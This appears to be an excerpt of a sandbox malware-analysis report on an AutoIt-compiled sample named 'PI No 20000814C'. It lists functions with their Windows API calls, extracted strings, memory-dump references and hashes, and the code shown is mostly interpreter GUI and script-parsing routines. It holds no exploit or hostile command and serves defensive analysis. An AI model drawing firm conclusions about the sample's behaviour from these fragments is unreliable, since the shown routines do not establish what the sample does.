                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction ID: 1a028a34ddff762eb9a2dd10b9ca66f3fd6c5f55a8f505a0aa39e32065c7a086
                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                    • Instruction Fuzzy Hash: D9C193366061B309DF2D8639B53417EBAE17AB27B131A076DE8B2CB5C4EF20D524F614
                                    Function 00F77B1B Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 491filecommemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DeleteObject.GDI32(00000000), ref: 00F77B70
                                    • DeleteObject.GDI32(00000000), ref: 00F77B82
                                    • DestroyWindow.USER32 ref: 00F77B90
                                    • GetDesktopWindow.USER32 ref: 00F77BAA
                                    • GetWindowRect.USER32(00000000), ref: 00F77BB1
                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00F77CF2
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00F77D02
                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77D4A
                                    • GetClientRect.USER32(00000000,?), ref: 00F77D56
                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00F77D90
                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77DB2
                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77DC5
                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77DD0
                                    • GlobalFix.KERNEL32(00000000), ref: 00F77DD9
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77DE8
                                    • GlobalUnWire.KERNEL32(00000000), ref: 00F77DF1
                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77DF8
                                    • GlobalFree.KERNEL32(00000000), ref: 00F77E03
                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00F92CAC,00000000), ref: 00F77E2B
                                    • GlobalFree.KERNEL32(00000000), ref: 00F77E3B
                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00F77E61
                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00F77E80
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F77EA2
                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00F7808F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$Global$Rect$CreateFile$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadMessagePictureReadSendShowSizeWire
                                    • String ID: $AutoIt v3$DISPLAY$static
                                    • API String ID: 2547915802-2373415609
                                    • Opcode ID: 2931fe8511728b10be28e33b4bd689547779f554f3dc0d5481cb62ea01622ddf
                                    • Instruction ID: 9818068d2a11ea601cc210cbec64d16eaa48e96fa7b1029dc70f6cd660c2832f
                                    • Opcode Fuzzy Hash: 2931fe8511728b10be28e33b4bd689547779f554f3dc0d5481cb62ea01622ddf
                                    • Instruction Fuzzy Hash: CF027D71910219AFDF14DFA4CD89EAE7BB9EF48310F108159F909EB2A1DB749D01EB60
                                    Function 00F837F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CharUpperBuffW.USER32(?,?,00F8F910), ref: 00F838AF
                                    • IsWindowVisible.USER32(?), ref: 00F838D3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: BuffCharUpperVisibleWindow
                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                    • API String ID: 4105515805-45149045
                                    • Opcode ID: baceeeb1f8f2dfc1d6400c86aa9d67142e9965b6dc1889f745bf88798d68c648
                                    • Instruction ID: e71978d35d7b40774a20839c994efeecb28291060032beb6b703f201146c518d
                                    • Opcode Fuzzy Hash: baceeeb1f8f2dfc1d6400c86aa9d67142e9965b6dc1889f745bf88798d68c648
                                    • Instruction Fuzzy Hash: A1D18D31208216DFCB14FF11C851AAA77A1AF94754F144458B8865B2F3DF79EE0AFB81
                                    Function 00F8A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetTextColor.GDI32(?,00000000), ref: 00F8A89F
                                    • GetSysColorBrush.USER32(0000000F), ref: 00F8A8D0
                                    • GetSysColor.USER32(0000000F), ref: 00F8A8DC
                                    • SetBkColor.GDI32(?,000000FF), ref: 00F8A8F6
                                    • SelectObject.GDI32(?,?), ref: 00F8A905
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00F8A930
                                    • GetSysColor.USER32(00000010), ref: 00F8A938
                                    • CreateSolidBrush.GDI32(00000000), ref: 00F8A93F
                                    • FrameRect.USER32(?,?,00000000), ref: 00F8A94E
                                    • DeleteObject.GDI32(00000000), ref: 00F8A955
                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00F8A9A0
                                    • FillRect.USER32(?,?,?), ref: 00F8A9D2
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F8A9FD
                                      • Part of subcall function 00F8AB60: GetSysColor.USER32(00000012), ref: 00F8AB99
                                      • Part of subcall function 00F8AB60: SetTextColor.GDI32(?,?), ref: 00F8AB9D
                                      • Part of subcall function 00F8AB60: GetSysColorBrush.USER32(0000000F), ref: 00F8ABB3
                                      • Part of subcall function 00F8AB60: GetSysColor.USER32(0000000F), ref: 00F8ABBE
                                      • Part of subcall function 00F8AB60: GetSysColor.USER32(00000011), ref: 00F8ABDB
                                      • Part of subcall function 00F8AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F8ABE9
                                      • Part of subcall function 00F8AB60: SelectObject.GDI32(?,00000000), ref: 00F8ABFA
                                      • Part of subcall function 00F8AB60: SetBkColor.GDI32(?,00000000), ref: 00F8AC03
                                      • Part of subcall function 00F8AB60: SelectObject.GDI32(?,?), ref: 00F8AC10
                                      • Part of subcall function 00F8AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00F8AC2F
                                      • Part of subcall function 00F8AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F8AC46
                                      • Part of subcall function 00F8AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00F8AC5B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                    • String ID:
                                    • API String ID: 4124339563-0
                                    • Opcode ID: fef133a1b33233605fc780ef6f4ff29650e84b428f81ad4f0dc218e1d5e08dd5
                                    • Instruction ID: f2c46c1fe1fdad8a34a6b4915b6320f2f5668366884a1ddcb7c3026090373184
                                    • Opcode Fuzzy Hash: fef133a1b33233605fc780ef6f4ff29650e84b428f81ad4f0dc218e1d5e08dd5
                                    • Instruction Fuzzy Hash: 37A19272408305EFD710AF64DC08AAB7BA9FF88331F144A2AF562D61A0D774D845EB52
                                    Function 00F777BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • DestroyWindow.USER32(00000000), ref: 00F777F1
                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00F778B0
                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00F778EE
                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00F77900
                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00F77946
                                    • GetClientRect.USER32(00000000,?), ref: 00F77952
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00F77996
                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00F779A5
                                    • GetStockObject.GDI32(00000011), ref: 00F779B5
                                    • SelectObject.GDI32(00000000,00000000), ref: 00F779B9
                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00F779C9
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F779D2
                                    • DeleteDC.GDI32(00000000), ref: 00F779DB
                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00F77A07
                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00F77A1E
                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00F77A59
                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00F77A6D
                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00F77A7E
                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00F77AAE
                                    • GetStockObject.GDI32(00000011), ref: 00F77AB9
                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00F77AC4
                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00F77ACE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                    • API String ID: 2910397461-517079104
                                    • Opcode ID: 5056e72ae32fb4fe776b4909d5b78c6e18e9e0bfd5affb6562b5341913fd3ba4
                                    • Instruction ID: b9562933ee8684955c48c23bd7bc585bc476804702e2a6f1b32fda8e80e832fe
                                    • Opcode Fuzzy Hash: 5056e72ae32fb4fe776b4909d5b78c6e18e9e0bfd5affb6562b5341913fd3ba4
                                    • Instruction Fuzzy Hash: 31A18F71A00209BFEB149BA4DD4AFEE7BA9EB48710F108114FA14E72E0D774AD04EB60
                                    Function 00F6AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 00F6AF89
                                    • GetDriveTypeW.KERNEL32(?,00F8FAC0,?,\\.\,00F8F910), ref: 00F6B066
                                    • SetErrorMode.KERNEL32(00000000,00F8FAC0,?,\\.\,00F8F910), ref: 00F6B1C4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DriveType
                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                    • API String ID: 2907320926-4222207086
                                    • Opcode ID: fbeac501aeefa89997c1022641543e13afdc6f9768ca18bea96050418b11710e
                                    • Instruction ID: 4679541552ff1824ac144c167b052e1bd32ee8fe6f8924aab9b2549f63e63e31
                                    • Opcode Fuzzy Hash: fbeac501aeefa89997c1022641543e13afdc6f9768ca18bea96050418b11710e
                                    • Instruction Fuzzy Hash: FE51B331A88306BBCB14EB11CD92ABD77B0AB167557304056E406E7292DB79ED81FF43
                                    Function 00F06A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                    • API String ID: 1038674560-86951937
                                    • Opcode ID: 9bdadfc36574f117215e766ffb89b8fada2b6e4b74177179b0d4dbc08dcd4b7c
                                    • Instruction ID: 432cbf313040dfea512ae050a755fffbcb8a5ed3c52e8eec54cee717263079bf
                                    • Opcode Fuzzy Hash: 9bdadfc36574f117215e766ffb89b8fada2b6e4b74177179b0d4dbc08dcd4b7c
                                    • Instruction Fuzzy Hash: 5A8108F1B40316BACB20BB60DD82FAF7768AF14710F044025F945EA1C2EB6CEA55F691
                                    Function 00F8AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSysColor.USER32(00000012), ref: 00F8AB99
                                    • SetTextColor.GDI32(?,?), ref: 00F8AB9D
                                    • GetSysColorBrush.USER32(0000000F), ref: 00F8ABB3
                                    • GetSysColor.USER32(0000000F), ref: 00F8ABBE
                                    • CreateSolidBrush.GDI32(?), ref: 00F8ABC3
                                    • GetSysColor.USER32(00000011), ref: 00F8ABDB
                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F8ABE9
                                    • SelectObject.GDI32(?,00000000), ref: 00F8ABFA
                                    • SetBkColor.GDI32(?,00000000), ref: 00F8AC03
                                    • SelectObject.GDI32(?,?), ref: 00F8AC10
                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00F8AC2F
                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F8AC46
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00F8AC5B
                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F8ACA7
                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00F8ACCE
                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00F8ACEC
                                    • DrawFocusRect.USER32(?,?), ref: 00F8ACF7
                                    • GetSysColor.USER32(00000011), ref: 00F8AD05
                                    • SetTextColor.GDI32(?,00000000), ref: 00F8AD0D
                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F8AD21
                                    • SelectObject.GDI32(?,00F8A869), ref: 00F8AD38
                                    • DeleteObject.GDI32(?), ref: 00F8AD43
                                    • SelectObject.GDI32(?,?), ref: 00F8AD49
                                    • DeleteObject.GDI32(?), ref: 00F8AD4E
                                    • SetTextColor.GDI32(?,?), ref: 00F8AD54
                                    • SetBkColor.GDI32(?,?), ref: 00F8AD5E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                    • String ID:
                                    • API String ID: 1996641542-0
                                    • Opcode ID: 666700577962612b91b3ceabaf4658b9d0ca86de96b3e59801f4e4133b1e40e3
                                    • Instruction ID: cf3eac1b199859f83cc246253ab403f86757ceca9ed4536f14612458115fa809
                                    • Opcode Fuzzy Hash: 666700577962612b91b3ceabaf4658b9d0ca86de96b3e59801f4e4133b1e40e3
                                    • Instruction Fuzzy Hash: 93613E72D00218EFEF119FA4DC48EEE7B79EB48320F244126F915AB2A1D7759D44EB90
                                    Function 00F88C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F88D34
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F88D45
                                    • CharNextW.USER32(0000014E), ref: 00F88D74
                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F88DB5
                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F88DCB
                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F88DDC
                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F88DF9
                                    • SetWindowTextW.USER32(?,0000014E), ref: 00F88E45
                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F88E5B
                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F88E8C
                                    • _memset.LIBCMT ref: 00F88EB1
                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F88EFA
                                    • _memset.LIBCMT ref: 00F88F59
                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F88F83
                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F88FDB
                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 00F89088
                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00F890AA
                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F890F4
                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F89121
                                    • DrawMenuBar.USER32(?), ref: 00F89130
                                    • SetWindowTextW.USER32(?,0000014E), ref: 00F89158
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                    • String ID: 0
                                    • API String ID: 1073566785-4108050209
                                    • Opcode ID: c115339104eff49ba18e2a31d9f59b0f7ceb9a2f5c9637588c098188d728c123
                                    • Instruction ID: c2d66c014331ca044ee406a9e850b6ab18b69a717765dcccd5f63f7aeea08883
                                    • Opcode Fuzzy Hash: c115339104eff49ba18e2a31d9f59b0f7ceb9a2f5c9637588c098188d728c123
                                    • Instruction Fuzzy Hash: 07E1C371904219AFDF20EF50CC88EFE7BB8EF05360F548159F915AA191DB748A86EF60
                                    Function 00F84B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 00F84C51
                                    • GetDesktopWindow.USER32 ref: 00F84C66
                                    • GetWindowRect.USER32(00000000), ref: 00F84C6D
                                    • GetWindowLongW.USER32(?,000000F0), ref: 00F84CCF
                                    • DestroyWindow.USER32(?), ref: 00F84CFB
                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00F84D24
                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F84D42
                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F84D68
                                    • SendMessageW.USER32(?,00000421,?,?), ref: 00F84D7D
                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F84D90
                                    • IsWindowVisible.USER32(?), ref: 00F84DB0
                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F84DCB
                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F84DDF
                                    • GetWindowRect.USER32(?,?), ref: 00F84DF7
                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00F84E1D
                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00F84E37
                                    • CopyRect.USER32(?,?), ref: 00F84E4E
                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00F84EB9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2080874220.0000000000F01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true
                                    • Associated: 00000000.00000002.2080849458.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000000FCE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2080874220.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081016283.000000000102B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2081044720.000000000102C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_f00000_PI No 20000814C.jbxd
                                    Similarity
                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                    • String ID: ($0$tooltips_class32
                                    • API String ID: 698492251-4156429822
                                    • Opcode ID: 83f3139ef5afb95ada518f64ffb2cf419a0e3a8eb394cec04c4cf88f3eede367
                                    • Instruction ID: eed4bb1b016e255d2c7403c807e65591bda460503d237fb4ee94717a0a851360
                                    • Opcode Fuzzy Hash: 83f3139ef5afb95ada518f64ffb2cf419a0e3a8eb394cec04c4cf88f3eede367
                                    • Instruction Fuzzy Hash: 6BB18071608341AFDB04DF64C849BAABBE4FF88314F008A1DF5999B2A1D775EC04EB91
                                    Function 00F027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00F028BC
                                    • GetSystemMetrics.USER32(00000007), ref: 00F028C4
